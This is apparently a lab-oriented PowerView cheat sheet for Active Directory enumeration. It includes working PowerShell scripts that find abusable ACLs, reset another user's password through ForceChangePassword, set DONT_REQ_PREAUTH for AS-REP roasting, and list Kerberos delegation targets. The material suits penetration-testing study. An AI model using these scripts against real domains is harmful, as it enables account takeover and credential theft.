PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
(The master-branch file is the older PowerView. The function names listed below come from the rewritten version on the dev branch, which keeps the old Get-Net* names as aliases.)
Misc Functions:
Export-PowerViewCSV
Append results to a CSV file
ConvertTo-SID
Convert a User or group name to its SID value
Get-DomainSPNTicket
Requests the Kerberos ticket for a specified Service Principal Name (SPN) account
Domain/LDAP Functions:
Get-Domain
Will return the AD object for the current (or specified) domain
Get-DomainController
Return a list of the Domain Controllers for the specified domain
Get-DomainUser
Will return all users or specific user objects in AD
Get-DomainComputer
Will return all computers or specific computer objects in AD
Get-DomainGroup
Will return all groups or specific group objects in AD
Get-DomainOU
Search for all or specific OU objects in AD
Find-InterestingDomainAcl
Finds object ACLs in the domain with modification rights set to non-built in objects
Get-DomainGroupMember
Will return the members of a specific domain group
Get-DomainFileServer
Returns a list of servers likely functioning as file servers
Get-DomainDFSShare
Returns a list of all Distributed File System (DFS) shares for the current (or specified) domain
GPO Functions:
Get-DomainGPO
Will return all GPOs or specific GPO objects in AD
Get-DomainPolicy
Returns the default domain policy or the domain controller policy for the current domain
Computer Enumeration Functions:
Get-NetLocalGroup
Enumerates local groups on the local or a remote machine
Get-NetLocalGroupMember
Enumerates members of a specific local group
Get-NetShare
Returns open shares on the local (or a remote) machine
Get-NetSession
Will return session information for the local (or a remote) machine
Test-AdminAccess
Tests if the current user has administrative access to the local (or a remote) machine
Threaded 'Meta'-Functions:
Find-DomainUserLocation
Finds machines where specific users are logged in
Find-DomainShare
Finds reachable shares on domain machines
Find-InterestingDomainShareFile
Searches for files matching specific criteria on readable shares in the domain
Find-LocalAdminAccess
Find machines on the local domain where the current user has local administrator access
Domain Trust Functions:
Get-DomainTrust
Returns domain trusts for the current domain or a specified domain
Get-ForestTrust
Returns all forest trusts for the current forest or a specified forest
Get-DomainForeignUser
Enumerates users who are in groups outside of the user's domain
Get-DomainForeignGroupMember
Enumerates groups with users outside of the group's domain and returns each foreign member
Get-DomainTrustMapping
Will enumerate all trusts for the current domain and any others seen.
Creating a List of Domain Users (ActiveDirectory RSAT module, not PowerView)
PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
In Windows PowerShell 5.1 the > operator writes UTF-16LE, which Linux tooling often fails to read; pipe through Out-File with -Encoding ascii if the list is going to be fed to other tools.
Finding Interesting ACLs
Find-InterestingDomainAcl
Converting a Name to a SID (Convert-NameToSid is an alias of ConvertTo-SID)
PS C:\htb> $sid = Convert-NameToSid wley
Using Get-DomainObjectACL
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
-Identity * walks the DACL of every object in the domain, so this is slow in a large domain. It also only matches ACEs granted to this SID directly; rights the user holds through group membership are not shown.
Interesting ActiveDirectoryRights:
GenericAll - full rights to the object (add users to a group or reset a user's password)
GenericWrite - update the object's attributes (e.g. logon script)
WriteOwner - change the object's owner to an attacker-controlled user and take over the object
WriteDACL - modify the object's ACEs and grant the attacker full control over the object
AllExtendedRights - ability to add a user to a group or reset a password
ForceChangePassword - ability to change a user's password without knowing the current one
Self (Self-Membership) - ability to add yourself to a group
Get-ObjectAcl -SamAccountName <samaccountname> -ResolveGUIDs
Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
-SamAccountName is a parameter of the older PowerView (the master-branch file linked above). In the dev-branch rewrite Get-ObjectAcl is an alias of Get-DomainObjectAcl and the target is selected with -Identity.
Resolving GUIDs
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Without -ResolveGUIDs an ExtendedRight ACE shows only the right's GUID; with it, ObjectAceType carries the name (e.g. User-Force-Change-Password).
Abusing ForceChangePassword (resetting a user's password with alternate credentials)
PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset
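The steps above (resolve a SID, pull every ACE that names it, resolve GUIDs, then act on a reset right) as one script. This is an added example, not code from the page or from PowerView itself; it assumes the dev-branch PowerView is loaded and reuses the page's account names (wley, damundsen, INLANEFREIGHT). The function names are mine and the wley password is a placeholder. It goes one step beyond the page's one-liners: it also matches ACEs granted to the groups the user belongs to, which the plain SID comparison misses, and it refuses to call Set-DomainUserPassword unless an ACE actually grants the reset.

```powershell
# Added example (not from the page or PowerView). Assumes PowerView (dev branch) is imported.

function Find-AbusableAcl {
    param([Parameter(Mandatory)][string]$Identity)

    # Matching only the user's own SID misses rights granted to a group it belongs to,
    # so collect the user's SID plus every group SID from its tokenGroups.
    $sids  = @(ConvertTo-SID -ObjectName $Identity)
    $sids += Get-DomainGroup -MemberIdentity $Identity | ForEach-Object { $_.objectsid }
    $sids  = $sids | Where-Object { $_ } | Sort-Object -Unique

    Get-DomainObjectAcl -Identity * -ResolveGUIDs |
        Where-Object { $sids -contains $_.SecurityIdentifier.Value } |
        ForEach-Object {
            $rights  = $_.ActiveDirectoryRights.ToString()
            # With -ResolveGUIDs an object ACE carries the right's name in ObjectAceType
            # (e.g. User-Force-Change-Password). An ExtendedRight ACE with no type, or with
            # type 'All', grants every extended right, which includes the password reset.
            $extType     = $_.ObjectAceType
            $allExtended = ($rights -match 'ExtendedRight') -and (-not $extType -or $extType -eq 'All')
            $canReset    = ($rights -match 'GenericAll') -or $allExtended -or
                           ($rights -match 'ExtendedRight' -and $extType -eq 'User-Force-Change-Password')
            $abusable    = $canReset -or ($rights -match 'GenericWrite|WriteOwner|WriteDacl|Self')
            if ($abusable) {
                [pscustomobject]@{
                    Holder           = ConvertFrom-SID $_.SecurityIdentifier.Value
                    Target           = $_.ObjectDN
                    Rights           = $rights
                    ObjectType       = $extType
                    CanResetPassword = $canReset
                    Inherited        = $_.IsInherited
                }
            }
        }
}

function Invoke-ForceChangePassword {
    # Reset $Target's password as $Holder, but only after confirming an ACE grants it.
    param(
        [Parameter(Mandatory)][string]$Holder,
        [Parameter(Mandatory)][pscredential]$HolderCred,
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][securestring]$NewPassword
    )
    $targetDn = (Get-DomainUser -Identity $Target -Properties distinguishedname).distinguishedname
    $ace = Find-AbusableAcl -Identity $Holder |
        Where-Object { $_.Target -eq $targetDn -and $_.CanResetPassword }
    if (-not $ace) { throw "$Holder holds no password-reset right over $Target; refusing to try" }
    Set-DomainUserPassword -Identity $Target -AccountPassword $NewPassword -Credential $HolderCred -Verbose
}

# Usage with the page's names. 'wley-password-here' is a placeholder, not a real value.
Find-AbusableAcl -Identity wley | Format-Table -AutoSize

$holderCred = New-Object System.Management.Automation.PSCredential(
    'INLANEFREIGHT\wley', (ConvertTo-SecureString 'wley-password-here' -AsPlainText -Force))
Invoke-ForceChangePassword -Holder wley -HolderCred $holderCred -Target damundsen `
    -NewPassword (ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force)
```

Get-DomainObjectAcl -Identity * reads every object's DACL, so on a large domain expect this to run for minutes; narrow it with -SearchBase to an OU once you know where the interesting targets live.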
Getting Group Members (local group on a host vs. domain group, with nesting expanded by -Recurse)
PS C:\Tools> Get-NetLocalGroupMember -GroupName "Remote Management Users"
ComputerName : ACADEMY-EA-MS01
GroupName : Remote Management Users
MemberName : INLANEFREIGHT\forend
SID : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup : False
IsDomain : UNKNOWN
PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Remote Management Users
GroupDistinguishedName : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : bdavis
MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3842939050-3880317879-2865463114-1162
AS-REP Roasting (accounts with Kerberos pre-authentication disabled)
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
...
Setting DONT_REQ_PREAUTH with PowerView (needs write access to the target's userAccountControl, e.g. GenericWrite; 4194304 is 0x400000, and -XOR flips the bit, so running the same command a second time clears the flag again)
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName))))
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName'
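The same flag handling as a script that can be run safely more than once. This is an added example, not code from the page or from PowerView; it assumes the dev-branch PowerView is loaded, keeps the page's 'userName' placeholder, and the function names are mine. The point it adds to the page's one-liner is the state check around the XOR write and a read-back to confirm the write took effect.

```powershell
# Added example (not from the page or PowerView). Assumes PowerView (dev branch) is imported.
$DontReqPreauth = 0x400000   # 4194304, UF_DONT_REQUIRE_PREAUTH
$AccountDisable = 0x2

function Get-AsrepRoastable {
    # Only enabled accounts matter: the KDC answers a disabled account with an error,
    # not with the encrypted AS-REP you want to crack.
    Get-DomainUser -UACFilter DONT_REQ_PREAUTH -Properties samaccountname,useraccountcontrol |
        Where-Object { ([uint32]$_.useraccountcontrol -band $AccountDisable) -eq 0 } |
        Select-Object -ExpandProperty samaccountname
}

function Test-DontReqPreauth {
    param([Parameter(Mandatory)][string]$Identity)
    $user = Get-DomainUser -Identity $Identity -Properties useraccountcontrol
    if (-not $user) { throw "no such user: $Identity" }
    ([uint32]$user.useraccountcontrol -band $DontReqPreauth) -ne 0
}

function Set-DontReqPreauth {
    # -XOR flips the bit, so the page's one-liner run twice puts the account back where it
    # started. Read the current state first so 'set' never clears and -Clear never sets.
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Identity, [switch]$Clear)
    $wanted = -not $Clear
    if ((Test-DontReqPreauth -Identity $Identity) -eq $wanted) {
        Write-Verbose "$Identity already has DONT_REQ_PREAUTH = $wanted"
        return $wanted
    }
    # Needs write access to the target's userAccountControl (GenericWrite/GenericAll on the object).
    # Reads and writes may land on different DCs; pass -Server to both cmdlets if replication lag bites.
    Set-DomainObject -Identity $Identity -XOR @{useraccountcontrol=$DontReqPreauth} -Verbose
    $now = Test-DontReqPreauth -Identity $Identity
    if ($now -ne $wanted) { throw "write to $Identity did not take effect; check your rights on the object" }
    $now
}

Get-AsrepRoastable                              # who is roastable before you touch anything
Set-DontReqPreauth -Identity userName           # flag set; collect the AS-REP hash, then
Set-DontReqPreauth -Identity userName -Clear    # put the flag back to leave the account as found
```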
Active Directory Information (older PowerView function names; the dev-branch rewrite keeps them as aliases of the Get-Domain* functions above)
Get-NetDomain
Gets information about the current domain.
Get-NetForest
Gets information about the current forest.
Get-NetDomainController
Gets the domain controllers in the current domain.
Get-NetGroup
Gets information about Active Directory groups.
Get-NetUser
Gets information about Active Directory users.
Get-NetComputer
Gets information about Active Directory computers.
Get-NetOU
Gets information about Active Directory organizational units.
Enumeration
Get-NetGroupMember
Gets the members of a domain group.
Get-NetLocalGroup
Gets the local groups on a remote computer (in the older PowerView this function returns the members of the local Administrators group by default and lists the groups themselves only with -ListGroups).
Get-NetLocalGroupMember
Gets the members of a local group on a remote computer (dev-branch name).
Get-NetShare
Gets the network shares on a remote computer.
Get-NetLoggedon
Gets the users currently logged on to a remote computer.
Privilege Discovery
Find-LocalAdminAccess
Finds the computers on which the current user has local administrator access.
Find-DomainUserLocation
Finds the computers on which given users (by default, members of Domain Admins) are logged in.
Find-InterestingDomainShareFile
Finds interesting files on readable shares in the domain.
Trust Relationships
Get-NetDomainTrust
Gets trust relationships between domains.
Get-NetForestTrust
Gets trust relationships between forests.
Remote Execution
Invoke-NetCommand
Not a PowerView function. PowerView is an enumeration toolkit and has no remote command-execution cmdlet; use Invoke-Command (PSRemoting), WMI or a separate tool for that.
Permission Enumeration
Get-NetFilePermissions, Get-NetSharePermissions, Get-NetLocalGroupMapping, Get-NetEffectivePermission
None of these exist in PowerView. AD object permissions are read with Get-ObjectAcl / Get-DomainObjectAcl (see above), share reachability with Find-DomainShare and Find-InterestingDomainShareFile, and NTFS permissions on files and shares with the built-in Get-Acl.
Service Enumeration
Get-NetService
Not a PowerView function. PowerView enumerates remote processes (Get-NetProcess, renamed Get-WMIProcess in the dev branch), not services; use Get-Service or Get-CimInstance Win32_Service for services.
Token Enumeration
Get-NetToken
Not a PowerView function; PowerView does not enumerate access tokens.
Session Enumeration
Get-NetSession
Gets the SMB sessions on a remote computer, i.e. which users are connected and from which address.
SID History
Invoke-NetUserAdd, Invoke-NetUserClone
Neither exists in PowerView, and PowerView cannot write sIDHistory at all (the attribute is system-protected and a DC refuses ordinary LDAP writes to it). PowerView can only read it, by asking Get-DomainUser for sidhistory in -Properties, which is useful for spotting migrated accounts or injected SIDs.
Domain Management
Add-NetGroupUser
Adds a user to a domain group (older PowerView; Add-DomainGroupMember in the dev branch). Add-NetGroupMember and Add-NetLocalGroupMember are not PowerView functions; local group membership is changed with the built-in Add-LocalGroupMember or net localgroup.
Kerberos Delegation
User Unconstrained Delegation
Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION
(PowerView returns raw LDAP attributes, so filtering on a TrustedForDelegation property only works with the RSAT Get-ADUser objects; in PowerView the flag is the 0x80000 bit of userAccountControl. Computers with unconstrained delegation are listed with Get-DomainComputer -Unconstrained.)
Constrained Delegation
Get-DomainComputer -TrustedToAuth
(filters on msds-allowedtodelegateto; user accounts can be configured the same way, so run Get-DomainUser -TrustedToAuth too)
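The delegation checks above as a single enumeration that also reports whether protocol transition is allowed and, going beyond the page, resource-based constrained delegation. This is an added example, not code from the page or from PowerView; it assumes the dev-branch PowerView is loaded and that the caller can read the domain, and the function name is mine.

```powershell
# Added example (not from the page or PowerView). Assumes PowerView (dev branch) is imported.
$TrustedToAuthForDelegation = 0x1000000   # UAC bit: protocol transition (S4U2Self) allowed

function Get-KerberosDelegation {
    # 1. Unconstrained (userAccountControl bit 0x80000). Domain controllers carry it by
    #    design, so drop them to keep the list to the servers worth going after.
    $dcs = Get-DomainController | ForEach-Object { $_.Name }
    Get-DomainComputer -Unconstrained -Properties samaccountname,dnshostname |
        Where-Object { $dcs -notcontains $_.dnshostname } |
        ForEach-Object { [pscustomobject]@{ Type='Unconstrained'; Principal=$_.samaccountname; Target='*'; ProtocolTransition=$true } }
    Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION -Properties samaccountname |
        ForEach-Object { [pscustomobject]@{ Type='Unconstrained'; Principal=$_.samaccountname; Target='*'; ProtocolTransition=$true } }

    # 2. Constrained: msds-allowedtodelegateto lists the SPNs the account may delegate to.
    #    With TRUSTED_TO_AUTH_FOR_DELEGATION set the account can impersonate any user to those
    #    SPNs via S4U2Self, without that user ever having authenticated to it.
    $constrained = @(Get-DomainUser     -TrustedToAuth -Properties samaccountname,'msds-allowedtodelegateto',useraccountcontrol) +
                   @(Get-DomainComputer -TrustedToAuth -Properties samaccountname,'msds-allowedtodelegateto',useraccountcontrol)
    foreach ($acct in $constrained) {
        $pt = ([uint32]$acct.useraccountcontrol -band $TrustedToAuthForDelegation) -ne 0
        foreach ($spn in @($acct.'msds-allowedtodelegateto')) {
            [pscustomobject]@{ Type='Constrained'; Principal=$acct.samaccountname; Target=$spn; ProtocolTransition=$pt }
        }
    }

    # 3. Resource-based: the target's msDS-AllowedToActOnBehalfOfOtherIdentity is a security
    #    descriptor whose DACL names the principals allowed to delegate to it.
    Get-DomainComputer -LDAPFilter '(msds-allowedtoactonbehalfofotheridentity=*)' -Properties samaccountname,'msds-allowedtoactonbehalfofotheridentity' |
        ForEach-Object {
            $target = $_.samaccountname
            $raw = $_.'msds-allowedtoactonbehalfofotheridentity'
            # PowerView hands the attribute back as raw bytes; parse it into a descriptor.
            $sd  = if ($raw -is [byte[]]) { New-Object Security.AccessControl.RawSecurityDescriptor($raw, 0) } else { $raw }
            foreach ($ace in $sd.DiscretionaryAcl) {
                [pscustomobject]@{ Type='ResourceBased'; Principal=(ConvertFrom-SID $ace.SecurityIdentifier.Value); Target=$target; ProtocolTransition=$null }
            }
        }
}

Get-KerberosDelegation | Sort-Object Type, Principal | Format-Table -AutoSize
```

The ProtocolTransition column is what decides whether a constrained-delegation account is useful without a victim first connecting to it; for resource-based entries it is left empty because the relevant bits live on the front-end account, not on the target.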
Retrieving Domain SID
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID
S-1-5-21-2974783224-3764228556-2640795941
General Tips
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993